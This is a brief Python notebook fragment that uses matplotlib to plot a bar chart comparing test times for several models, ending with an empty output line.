test_times = [1.54329, 0.14877, 0.199471, 126.50875, 0.09605, 2.95039]
fig = plt.figure(figsize=(15, 3), num=10)
plt.subplot(131)
plt.bar(model_labels, test_times)
Output: